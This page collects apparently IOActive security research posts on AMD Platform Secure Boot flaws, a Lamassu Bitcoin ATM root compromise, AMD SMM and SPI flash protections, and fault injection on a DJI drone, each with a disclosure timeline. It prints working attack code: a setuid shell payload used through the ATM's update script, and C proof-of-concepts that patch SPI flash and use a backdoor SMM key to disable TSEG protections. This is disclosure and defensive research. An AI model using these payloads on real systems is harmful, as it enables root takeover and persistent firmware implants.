In short, the role of the PSB is to ensure that the initial UEFI phases, specifically the SEC and PEI phase, are properly verified and cannot be tampered with. In turn, the PEI phase will verify the DXE phase using a proprietary and vendor-specific method.   

The resulting scheme is summarized in the following image:

Upon reset, only the AMD Platform Security Processor (PSP), an ARM-based co-processor embedded within the AMD chip, is running. It functions as a hardware root-of-trust and verifies the SEC and PEI phase portions of the UEFI firmware. If verification succeeds, then it releases the main cores that then start executing the SEC and PEI phase.

Trust Hierarchy

In order to understand the trust hierarchy in more depth, we will first take a look at how the UEFI firmware, stored in the SPI flash, is structured. To do so, we will use the SPI flash dump we have obtained from an AMD-based Huawei Matebook 16 (BIOS v2.28).

When we open up a SPI flash dump with our trusty UEFI Tool, we will typically see, among others, the following structures:

  • Padding areas
  • Firmware volumes (containing DXE drivers and SMM modules)
  • NVRAM data (containing non-volatile configuration data, i.e. UEFI variables)

However, while UEFI Tool correctly identifies firmware volumes that contain code executed in the DXE phase of the UEFI boot process, the code running in the SEC and PEI phases seems to be missing altogether.

This is because it does not support parsing an AMD platform specific structure called the Embedded Firmware Structure (EFS). Once again, for the sake of brevity, as the structure is relatively complex, we will only focus on portions relevant to the chain-of-trust.

As described here, the EFS is located at one of the pre-defined locations in the SPI flash and contains pointers to:

  1. The PSP directory table that includes:
    • The BIOS signing key (entry type 0x05)
    • The BIOS PEI firmware volume (entry type 0x62)
    • The BIOS PEI firmware volume signature (entry type 0x07)
  2. The BIOS directory table that includes:
    • The AMD root signing key (entry type 0x00)

In visualized form, the resulting data structure looks as follows:

As a sidenote, we have also developed a simple parser (available here) that can be used to parse and extract the different portions of the PSP and BIOS directories.

Upon reset, the PSP will hold the main cores and verify the trust chain in the following order:

  • The AMD root signing key is verified against a SHA256 hash programmed into the PSP
  • The BIOS signing key is verified against the AMD root signing key
  • The BIOS PEI firmware volume is verified against the BIOS signing key

At this point the PSP releases the main cores and the SEC+PEI phase code, stored in the PEI firmware volume, will execute. Then, to complete the chain-of-trust, a vendor-specific PEI module will verify the DXE firmware volume(s).

PSB Configuration

The next step is to understand how we can interact with the PSP to determine whether the PSB is properly configured or not. This, in turn, could be used to implement a simple tool to detect potential misconfigurations. 

Here we found that the configuration can be checked by first determining the PSP MMIO base address and then, at a specific offset, reading out the value of two PSB-related registers.

PSP MMIO Base Address

First, the PSP MMIO base address is obtained by writing a specific value to a register of the AMD IOHUB Core (IOHC). More specifically:

  • 0x13E102E0 for families 17h, model 30h/70h or family 19h, model 20h or
  • 0x13B102E0 for all other models

is written to the register at offset 0xB8 of the IOHC device (on bus 00h, device 00h, function 00h) and the result is read from the register at offset 0xBC.

For example, on an Acer Swift 3 (fam 17h, model 60h) we write the value 0x13B102E0 at offset 0xB8 of the IOHC and read the base address 0xFDE00000 (after masking) at offset 0xBC.

PSB Configuration Registers

The PSB fuse register, located at offset 0x10994, reflects the actual fuse configuration and has the following structure:

It has various fields, such as:

  • the platform vendor ID and platform model ID to uniquely identify the platform
  • the BIOS key revision and anti-rollback to revoke BIOS signing keys
  • the AMD disable key to prevent booting a BIOS signed with the AMD root signing key
  • the PSB enable field to enable the feature
  • the customer key lock to permanently burn the fuses

We observed that on systems with the PSB enabled, typically the platform vendor ID, the platform model ID, the PSB enable bit and the customer key lock are configured accordingly. In fact, if the BIOS was compiled with the feature enabled, the fusing process occurs automatically when the system boots for the first time.

Interestingly, the PSB can also be permanently disabled by setting the PSB enable bit to 0 and the customer key lock to 1. This would enable an attacker to leave the system vulnerable indefinitely and is similar to what was discovered for Intel BootGuard by Alexander Ermolov (see Safeguarding Rootkits: Intel BootGuard at ZeroNights). 

The PSB status register, located at offset 0x10998, is used for obtaining PSB state information and has the following structure:

Here we only know that the PSB status field returns 0x00 if no errors occurred; otherwise returns a non-zero value likely corresponding to a specific error code.

Vulnerabilities

Now that we understand how the PSB should be configured, we would like to walk you through misconfiguration and implementation issues we discovered during our research.

For completeness, the list of systems we tested and whether they were found to be vulnerable or not can be found in a table at the end of this blog.

Configuration flaws

Based on our knowledge of the PSB fuse and status registers, we implemented the logic into our in-house developed platform testing tool Platbox (see here) and discovered that almost none of the tested systems had the feature enabled. 

As can be seen below, the Lenovo IdeaPad 1 Gen7 (BIOS JTCN44WW) did not have the PSB fuse register burned and the PSB status field returned a non-zero value. In fact, the same pattern was observed on all other vulnerable systems.

When trying to determine the root cause, we found that various data structures that are essential to the correct functioning of the PSB were missing, such as the BIOS signing key and the BIOS PEI firmware volume signature. This may indicate that already during the build process of the firmware image the feature was simply disabled.

Implementation flaws

Beyond configuration flaws, we also wanted to find out whether there were any potential implementation issues. While AMD implements the first portion of the chain-of-trust, verifying the SEC and PEI phase, we decided to focus on the vendor-specific portion that verifies the DXE phase.

To begin, we picked the Lenovo Thinkpad P16s Gen1 (BIOS v1.32) as our target, as it was one of the few systems that had the PSB enabled, and inspected the firmware with UEFI Tool. As it turns out, it uses a Phoenix-based BIOS and a well-known data structure, called the Phoenix hash file, to verify the DXE phase:

The Phoenix hash file format is straightforward – it is a list of protected ranges of the SPI flash encoded using triples that consist of base address, size and a hash. These protected ranges should, at least in theory, cover the DXE phase code, stored in DXE firmware volumes, that will be loaded.

However, we found that that multiple firmware volumes were used and that one of them (GUID 8FC151AE-C96F-4BC9-8C33-107992C7735B) was not covered by the protected ranges. Thereby, code contained within said volume could be tampered with and it would be automatically loaded during the boot process.

To make matters worse, we noticed that while the BIOS PEI firmware volume, verified by the PSP, was located in the beginning of the firmware in the padding section, whereas the Phoenix hash file was located at the end of it and thereby could be tampered with.

To confirm that the issue was indeed exploitable, we replaced the PersistenceConfigDxe DXE driver (GUID 27A95D13-15FB-4A2E-91E2-C784BF0D20D3) with a malicious DXE driver that configures the SMM_KEY MSR and allows us, at runtime, to disable the TSEG protections and thereby trivially escalate privileges to SMM (see previous blog post for more details).

Note that an advisory was published by Lenovo (see here) for this vulnerability (assigned CVE-2023-5078) that details which systems it affected and when different BIOS updates were released.

Vendor response

As part of our responsible disclosure process, we have reached out to various vendors in order to address the issues and get an understanding of the underlying problem. The responses were, to say the least, quite surprising:

Acer

“We appreciated your information about a possible vulnerability in Acer product. After thoroughly investigation, AMD PSB is an Optional Design during develop on consumption product, it’s not a mandatory requirement in Swift 3 SF314-42;

even though AMD PSB status is not enabled by default, platform with Secure Boot and Secure Flash are in position to protect system if malicious code injecting to flash ROM, so we don’t consider this as a vulnerability.”

Lenovo

“Platform Secure Boot was introduced as a standard feature on all consumer Lenovo laptops in 2022, and laptops manufactured prior to this date were not designed with this feature in mind. Enabling it on devices now in the field would be likely to frustrate consumers if any unexpected issues arise.”

Huawei

The PSB function was not enabled on our early AMD platform product, the PSB-like function(also known as “Intel Boot Guard”) was enabled on our later Intel platform product (such as MateBook 16s 2022).

We confirmed with the BIOS supplier (Wingtech Technology) of the AMD platform product, there is no modification plan for this issue. To avoid confusing users, we kindly ask you not to disclose this issue. […]”

Conclusions

The results of our research demonstrate how vendors systematically failed to either properly configure the platform or correctly implement the chain-of-trust. Although it is clear how this issue needs to be addressed, based on vendor responses, it appears that they are reluctant to do so.

These issues would allow an attacker that has obtained a foothold on the OS, in combination with a SPI flash write primitive (e.g. CVE-2023-28468), to install firmware implants on the system. These, by design, bypass any OS- and Hypervisor-level protections that may be implemented and, if done properly, can also be made resistant to traditional firmware updates.

To determine whether you are vulnerable, we recommend running our in-house developed tool Platbox (see here) and, if that is the case, to reach out to the vendor in the hope that they will address these issues.

Appendix

The following table lists the systems we tested and what we discovered.

INSIGHTS, RESEARCH | January 18, 2024

Owning a Bitcoin ATM

Nowadays, Bitcoin and cryptocurrencies might look less popular than they did just a few years ago. However, it is still quite common to find Bitcoin ATMs in numerous locations. 

IOActive had access to few of these machines, specifically to Lamassu’s Douro ATM (https://lamassu.is). This provided us with the opportunity to assess the security of these devices – more specifically, to attempt to achieve full control over them.

Figure 1. Lamassu Douro Bitcoin ATM

In this post, we’ll explain all the steps we followed to identify a series of vulnerabilities (CVE-2024-0175, CVE-2024-0176 and CVE-2024-0177) that allows full control over these ATMs. For this exercise, we are assuming the role of an attacker with the same physical access to the device that a regular customer might have. 

Don’t Touch Me

After booting up, the screen displays the the UI for the kiosk’s primary application. However, during boot, for a few seconds the user can interact with the Linux operative system’s window manager, as illustrated in Figure 2.

Figure 2. Accessing Applications during boot

During this time, it was possible to pop up a terminal window or run any other installed application as a low-privilege user.

Look at the Camera!

In order to obtain full control over the device, the next step was to perform a privilege escalation. To achieve this, we exploited the software update mechanism by creating a file named ‘/tmp/extract/package/updatescript.js’ with the following payload:

cp = require(“child_process”)
cp.exec(“cp /bin/sh /tmp/shuid; chmod +sx /tmp/shuid”)

Next, we created a file named ‘done.txt’ in the ‘/tmp/extract folder.’ This would trigger the watchdog process, which runs as root in the reviewed machines, to execute the JavaScript payload.

How did we create these files? Well, that’s an interesting question, as although we gained access to the graphical interface and the terminal, there was no keyboard plugged in. While we did have physical access to the devices, so that opening them and plugging in a keyboard would be too easy, the goal was to gain control without invasive physical access, therefore we explored a different approach.

The ATM supports a feature that enables it to read QR codes, and the binary located at ‘/usr/bin/zbarcam’ could be executed using the touch controls, so we only had to use a custom QR code containing our payload. Once the payload was read, a root shell was popped.

The following video illustrates the paths we followed to exploit the vulnerability.

Once we gained root access, we could reasonably think that the job was done. However, we looked to the ‘/etc/shadow’ file, where we were able to crack the root password in less than one minute – and the same password was valid for all of the devices.

Disclosure Timeline

 IOActive followed responsible disclosure procedures which included the following:

  • 11th July 2023 – Initial contact to report the vulnerabilities.
  • 9th October 2023 – The vendor confirmed the issues were fixed.
  • 25th October 2023 – The vendor asked us to delay publishing details about the vulnerabilities.
  • 22nd November 2023 – The vendor contacted us and published an advisory mentioning the issues were fixed.
  • 18th January 2024 – CVEs have been published by the corresponding CNA.

The following security bulletin was released by Lamassu regarding their remediation of the security issues found by IOActive:

https://support.lamassu.is/hc/en-us/articles/20747552619149-Security-update-for-Douros-2023-10-26

INSIGHTS, RESEARCH | June 23, 2023

Back to the Future with Platform Security

Introduction

During our recent talk at HardwearIO (see here, slides here) we described a variety of AMD platform misconfigurations that could lead to critical vulnerabilities, such as:

  • TSEG misconfigurations breaking SMRAM protections
  • SPI controller misconfigurations allowing SPI access from the OS
  • Platform Secure Boot misconfigurations breaking the hardware root-of-trust

Here we are providing a brief overview of essential registers settings and explain how our internally developed tool Platbox (see here) can be used to verify them and ultimately exploit them.

SMM Protections

In a previous blog post about AMD platform security (see here) we explained how forgetting to set a single lock can lead to a complete compromise of System Management Mode (SMM).

To recap, on modern systems SMM lives in a protected memory region called TSEG and four Model Specific Registers (MSRs) need to be configured to guarantee these protections:

  • 0xC0010111 (SMM_BASE; base of SMM code)
  • 0xC0010112 (SMMAddr; defines TSEG base address)
  • 0xC0010113 (SMMMask; defines TSEG limit and TSEG enable bit)
  • 0xC0010015[SmmLock] (HWCR; defines lock of the aforementioned MSRs)

In the following we can see a breakdown of the aforementioned registers using Platbox on the Acer Swift 3 (model no. SF314-42; BIOS v1.10):

As marked in the output, the SMMLock bit in the Hardware Configuration Register (HWCR) hasn’t been set and therefore the TSEG region protections can simply be disabled by a privileged OS attacker by disabling the TValid bit in the SMMMask MSR.

Additionally, to ensure that the SMM code lies within the protected TSEG region, one should also confirm that the SMM base address (stored in the SMM_BASE MSR) lies inside of TSEG.  In most cases the EDK2 framework will ensure that this is the case. It is also interesting to notice that  SMM_BASE is also locked when SMMLock is set, thus preventing relocation attacks.

One additional register that is relevant to the security of SMM is the SMM key register (stored in the SMM_KEY MSR at 0xC0010119; see p630 in [1]). This is a write-only MSR that can be set before SMMLock to create a password-protected mechanism to clear SMMLock later on.

As mentioned in our presentation, while we haven’t found an OEM using this register, we used it as part of an exploit to demonstrate persistence in vulnerable platforms.

SPI Flash Protections

The SPI flash plays an important role in the context of platform security as it is used to store both the UEFI BIOS firmware code and configuration data (e.g. the Secure Boot state).

Architecturally, firmware code should only be modified at boot-time during firmware updates (via signed capsule updates) whereas portions of configuration data can be modified at run-time (in a controlled way via SMM).

To enforce this, the SPI controller-related protections need to be configured accordingly. In the following we will explain the relevant protection mechanisms, both the classic ones and the modern ones that will soon replace them.

Classic Protections

Two classic protection mechanisms exist, referred to as ROM protected ranges and SPI restricted commands, each responsible for preventing different types of accesses (see p445 in [2]).

First, ROM protected ranges apply to direct accesses via memory-mapped IO which, in turn, are automatically translated by the hardware into transactions on the SPI bus.

These ranges are configured via four write-once ROM protect registers (see p440 in [2]):

  • D14F3x050 FCH::ITF::LPC::RomProtect0
  • D14F3x054 FCH::ITF::LPC::RomProtect1
  • D14F3x058 FCH::ITF::LPC::RomProtect2
  • D14F3x05C FCH::ITF::LPC::RomProtect3

As we can see below, each of these registers defines the base address, the size and the access protection (read / write):

At the same time, it is important to enable and lock the ROM protected ranges with the AltSPICS register (see p450 in [2]):

  • SPIx01D FCH::ITF::SPI::AltSPICS[SpiProtectEn0]
  • SPIx01D FCH::ITF::SPI::AltSPICS[SpiProtectEn1]
  • SPIx01D FCH::ITF::SPI::AltSPICS[SpiProtectLock]

However, we observed that although some systems don’t configure these ranges, we haven’t been able to perform writes to the SPI flash using this method neither from the OS nor from SMM.

Second, SPI restricted commands apply to indirect accesses via the SPI controller wherein SPI registers are programmed directly. As part of it, two restricted command registers are configured (see p447-448 in [2]):

  • SPIx004 FCH::ITF::SPI::SPIRestrictedCmd
  • SPIx008 FCH::ITF::SPI::SPIRestrictedCmd2

Each of these registers defines up to four SPI opcodes that are blocked. Again, we can see the breakdown below:

In this example we can see that SPI writes are blocked altogether by restricting the Write Enable (WREN) opcode that needs to be sent before every SPI write operation.

In practice, when SMM code needs to perform a SPI write transaction it will temporarily disable the restricted command registers, perform the write operation and then restore the restricted command registers again.

In case these protections are misconfigured, as we have observed on various systems, a privileged OS attacker can easily exploit this issue. In the following we see a simple proof-of-concept that will patch portions of the SPI flash (see here):

void proof_of_concept()
{
    amd_retrieve_chipset_information(); 


    // Read and print SPI flash portion
    BYTE *mem = (BYTE *)calloc(1, 4096);
    read_from_flash_index_mode(NULL, target_fla, 4096, mem);
    print_memory(0xFD00000000 + target_fla, (char *)mem, 0x100);
  
    // Patch SPI flash
    UINT32 target_fla = 0x00000000;
    const char msg[] = "Dude, there is a hole in my BIOS";
    amd_spi_write_buffer(NULL, target_fla, (BYTE *)msg, strlen(msg));
    

    // Read and print modified SPI flash portion
    read_from_flash_index_mode(NULL, target_fla, 4096, mem);
    print_memory(0xFD00000000 + target_fla, (char *)mem, 0x100);
    free(mem);
}

In short, the code will first print the portion of the flash that is to be patched. It will then patch it, and finally print the modified flash portion again. The amd_spi_write_buffer() API automatically handles reading the affected SPI flash pages, patching them and writing them back.

Modern SPI Protections

On more modern systems we have observed that the aforementioned protection mechanisms are slowly being replaced by a newer technology referred to as ROM Armor.

In essence, ROM Armor is AMD’s equivalent of Intel’s Protected Range Registers (PRRs) and ensures that only whitelisted portions of the SPI flash can be modified at run-time (in a controlled fashion via SMM).

To determine which portions of the SPI flash are whitelisted, we developed a script that parses the PSP directory and extracts the whitelisted regions (see here):

Note that in this case we used an Acer TravelMate P4 (model no. TMP414-41-R854; BIOS v1.08) instead as this technology is only present in most recent systems.

Hardware Root-of-Trust Configurations

Platform Secure Boot (PSB) is AMD’s implementation of a hardware root-of-trust and ensures that initial phases of the UEFI BIOS firmware haven’t been tampered with and is the main line of defense against persistent firmware implants.

PSB is implemented using an embedded chip called the Platform Security Processor (PSP). In order for PSB to be enforced, the UEFI BIOS firmware needs to be built accordingly and the PSB related fuses in the PSP need to be configured.

We’ve found that two registers in particular can be leveraged to determine whether PSB has been enabled correctly:

  • PSB Fuse Register (defines fuse configuration)
  • PSB State Register (defines configuration state)

While the PSB fuse register can be used to determine whether PSB has been enabled and the fuses have been locked, the PSB state register indicates the status of the PSB configuration.

Herein we can see a more detailed breakdown of these registers:

As we can see, the Acer Swift 3 does not properly configure the PSB fuses and the PSB status indicates that an error has occurred.

The following video demonstrates how the ability to write to the SPI flash (via an SMI vulnerability or SPI controller misconfigurations), combined with the lack of PSB, results in a persistent firmware implant.

First, we attempt to read the TSEG region and see that it’s not accessible as it returns FFs only. We therefore patch the firmware with our backdoor inside of it via a vulnerable SMI handler and reset the system:

Next, we attempt to read the TSEG region again and see that the result is the same. However, this time around after disabling the TSEG protections via the SMM_KEY that was configured by our backdoor, we are able to read it out:

Here is the proof-of-concept that leverages the SMM key configured by the backdoor, clears the SmmLock bit in the HWCR register and finally disables TSEG protections (see here):

#define MSR_SMM_KEY     0xC0010119
#define MSR_SMM_KEY_VAL 0x494f414354495645

int main(int argc, char **argv)
{ 
  open_platbox_device();
  
  // Fetching TSEG base address and size
  UINT64 tseg_base = 0;
  UINT32 tseg_size = 0;
  get_tseg_region(&tseg_base, &tseg_size);
  printf("TSEG Base: %08x\n", tseg_base);
  printf("TSEG  End: %08x\n", tseg_base + tseg_size);

  // Reading start of TSEG region
  printf("\nReading TSEG region:\n");
  void *tseg_map = map_physical_memory(tseg_base, PAGE_SIZE);
  print_memory(tseg_base, (char *) tseg_map, 0x100);
  unmap_physical_memory(tseg_map, PAGE_SIZE);
  
  // Disabling TSEG protections using backdoor
  getchar();
  printf("=> Setting SMM Key\n");
  do_write_msr(MSR_SMM_KEY, MSR_SMM_KEY_VAL);

  getchar();
  printf("=> Disabling TSEG protection\n");
  UINT64 tseg_mask = 0;
  do_read_msr(AMD_MSR_SMM_TSEG_MASK, &tseg_mask);
  do_write_msr(AMD_MSR_SMM_TSEG_MASK, tseg_mask & 0xFFFFFFFFFFFFFFFC);

  // Reading start of TSEG region
  getchar();
  printf("\nReading TSEG region:\n");
  tseg_map = map_physical_memory(tseg_base, PAGE_SIZE);
  print_memory(tseg_base, (char *) tseg_map, 0x100);
  unmap_physical_memory(tseg_map, PAGE_SIZE);
  
  close_platbox_device();

  return 0;
}

SMM Supervisor OEM Policies

The SMM Supervisor is AMD’s approach at deprivileging and isolating SMI handlers. When implemented, SMI handlers need to go through an enforcement module to gain access to MSRs and IO registers. Additionally, paging is added which limits their access to arbitrary system memory. Everytime an SMI attempts to access these privileged resources, an OEM policy is checked to see if they can have access or not. 

OEM policies live within the Freeform Blob called SmmSupvBin with the GUID {83E1F409-21A3-491D-A415B163A153776D}.  The policy contains multiple types of entries:

  • Memory
  • IO Register
  • MSR
  • Instruction
  • SaveState

A small utility is available in the Platbox repository (see here). This utility will attempt to parse UEFI images and extract the policy, or if you provide a raw policy format that has been previously extracted it will print the details.

For example, this is a section of an OEM policy which is specifically restricting IO Register Write access to the IO Registers 0xCF8 and 0xCFC, thus specifically restricting access to PCI configuration space. We believe that this will come in handy in the future to perform baseline comparisons against OEM policies across various platforms. It gives researchers the ability to quickly see if an OEM failed to restrict a specific MSR or IO Register which may aid an attacker.

Resources

[1] AMD64 Architecture Programmer’s Manual, Volume 2: System Programming
[2] Processor Programming Reference (PPR) for AMD Family 17h Model 20h, Revision A1 Processors

INSIGHTS, RESEARCH | June 13, 2023

Applying Fault Injection to the Firmware Update Process of a Drone

IOActive recently published a whitepaper covering the current security posture of the drone industry. IOActive has been researching the possibility of using non-invasive techniques, such as electromagnetic (EM) side-channel attacks or EM fault injection (EMFI), to achieve code execution on a commercially available drone with significant security features. For this work, we chose one of the most popular drone models, DJI’s Mavic Pro. DJI is a seasoned manufacturer that emphasizes security in their products with features such as signed and encrypted firmware, Trusted Execution Environment (TEE), and Secure Boot.

Attack Surface

Drones are used in variety of applications, including military, commercial, and recreational. Like any other technology, drones are vulnerable to various types of attacks that can compromise their functionality and safety. 

As illustrated above, drones expose several attack surfaces: (1) backend, (2) mobile apps, (3) radio frequency (RF) communication, and (4) physical device.

As detailed in the whitepaper, IOActive used EM emanations and EMFI due to their non-invasive nature. We leveraged Riscure products as the main tools for this research.

The image below show the PCB under analysis after being removed from the drone; power has been connected to an external power supply.

First Approach

Our first approach was to attempt to retrieve the encryption key using EM emanations and decrypting the firmware. We started by finding an area on the drone’s PCB with a strong EM signal so we could place a probe and record enough traces to extract the key.

After identifying the location with strongest signal, we worked on understanding how to bypass the signature verification that takes place before the firmware is decrypted. After several days of testing and data analysis, we found that the probability of successful signature bypass was less than 0.5%. This rendered key recovery unfeasible, since it would have required us to collect the tens of thousands of traces.

Second Approach

Our second approach was to use EMFI based on the ideas published by Riscure (https://www.riscure.com/publication/controlling-pc-arm-using-fault-injection). Riscure proposes using a glitch to cause one instruction to transform into another and gain control of, for example, the PC register. The following image shows the setup we used for this approach, which included a laptop (used as a controller), a power supply, Riscure’s Spider (used to generate the trigger), an oscilloscope, an XYZ table, and the EMFI pulse-generator.

After identifying a small enough area on the PCB, we modified the glitch’s shape and timing until we observed a successful result. The targeted process crashed, as shown below:  

Our payload appeared in several registers. After examining the code at the target address, we determined that we had hit a winning combination of timing, position, and glitch shape. The following capture shows the instruction where a segmentation error took place:

The capture clearly shows a load instruction copying our data to registers R0 and R1. In addition, the GDB output also shows that registers R3 and R4 ended up with controlled data. Further details can be found in the whitepaper.

Having successfully caused memory corruption, the next step would be to design a proper payload that achieves code execution. An attacker could use such an exploit to fully control one device, leak all sensitive content, enable ADB access, and potentially leak the encryption keys.

Disclosure Timeline

The DJI team response was excellent, fast and supportive.

2023-04-04: Initial Contact with DJI including sharing report.
2023-05-04: DJI agrees on publication date.